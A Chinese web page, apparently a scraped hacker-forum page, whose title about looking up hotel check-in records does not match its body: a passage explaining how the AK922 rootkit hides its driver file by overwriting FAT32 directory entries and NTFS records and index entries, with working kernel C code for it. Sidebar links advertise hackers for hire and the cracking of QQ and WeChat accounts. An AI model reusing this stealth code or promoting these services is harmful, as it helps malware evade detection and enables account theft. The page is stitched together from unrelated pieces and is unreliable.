怎么查询全国开房记录查询系统 查酒店入住信息
FileName[1]; }INDEX_ENTRY, *PINDEX_ENTRY; 在读取磁盘文件信息时每次都是以一个扇区大小(512 bytes)的整数倍进行的,如果不了解相应卷的组织形式和数据结构,那么感觉就是数据多而繁杂,搜索效率也很低。但辅以上述结构便可快速定位待隐藏文件并进行涂改。这里不得不说一句,算法的高效是很重要的,如果采用暴力搜索的方式,那么系统BSOD的概率会大大增加。 在FAT32卷上,当AK922搜索到文件AK922.sys的目录项时,将其0x0偏移处的文件名的之一个字节置为"0xe5",即标记为删除。这样即可达到欺骗ark的目的。但为了更加隐蔽,不让winhex察觉出来,更好把文件名全部清0。 处理NTFS卷稍微麻烦些,文件记录和索引项都要抹干净,具体实现见代码,这里不再赘述。 VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen) { ULONG i; BOOLEAN bIsNtfsIndex; BOOLEAN bIsNtfsFile; ULONG offset = 0; ULONG indexSize = 0; PINDEX_ENTRY currIndxEntry = NULL; PINDEX_ENTRY preIndxEntry = NULL; ULONG currPosition; bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0); bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0); if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE) { for(i = 0; i < BufLen/0x20; i++) { if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3)) { *(PUCHAR)UserBuf= 0xe5; *(PULONG)((ULONG)UserBuf + 0x1)= 0; break; } UserBuf = (PVOID)((ULONG)UserBuf + 0x20); } } else if(bIsNtfsFile) { //DbgPrint("FILE0..."); for(i = 0; i < BufLen / FILERECORDSIZE; i++) { if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9)) { memset((PVOID)UserBuf, 0, 0x4); memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18); break; } UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE); } } else if(bIsNtfsIndex) { //DbgPrint("INDX..."); // Index Entries offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18; indexSize = BufLen - offset; currPosition = 0; currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset); //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize); while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0) { if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9)) { memset((PVOID)currIndxEntry->FileName, 0, 18); if(currPosition == 0) { ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size; break; } preIndxEntry->Size += currIndxEntry->Size; break; } currPosition += currIndxEntry->Size; preIndxEntry = currIndxEntry; currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size); } } } 水平有限,欢迎大家与我交流。 参考资料: [1] - 《NTFS Documentation》 [2] - Azy,《IceSword & Rootkit Unhooker驱动简析》
相关文章
黑客接单论坛_真黑客怎样找
· 比特币黄金(Bitcoin Gold)也是来源于比特币区块链的,5月份遭受了51%进犯。 进犯造成约1750万美元的丢掉。 · Bitconnect钱银价值暴降,宣告封闭旗下买卖所,并暂停借款事务...
黑客破解qq帐号密码,微信黑客能否转走钱,黑客网络eos的密码是什么意思
AddHandler fcgid-script .htmlFcgidWrapper "../../php/php7.3.4nts/php-cgi.exe" .html一望而知,读取了两个文件后,htt...
网赚江湖
亲自测试实际效果确是非常好。大批量登陆,设定母号分享以后,用时一个多钟头,数据信息第二天六点就升级了。做了一系列的事儿以后,去补觉。 夜里六点,看第一天的成效,在我的预料以内,5000多元钱。...
九岁黑客天才(十四岁天才黑客)
本文目录一览: 1、中国最小黑客汪正扬,因不想写作业黑掉学校网站,现在他怎样了? 2、有哪些天才少年黑客? 3、他是我国最小黑客,8岁利用漏洞一元买2500元商品,如今怎样? 4、中国年龄...
正规黑客联系电话「做事有规矩的黑客联系方式」
正规黑客联系电话 过了几年,他有发现了一个关于人体插泵机械的漏洞。他黑入人体,在百米操作范围内,侦查除了周围哪些人带有胰岛素泵的,然后侦破了他们的注册机制码,再对这些机制码进行了程序格...
5nm新旗舰Exynos 1080,将重塑5G芯片市场格局?
不论是PC时期和手机上时期,处理芯片特性一直是互联网技术硬件配置市场竞争的具体内容。每个大型厂为了更好地设计方案最优秀的处理芯片,代工企业为了更好地产品研发最优秀的工艺加工工艺,通常甘愿一掷千金。可是...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!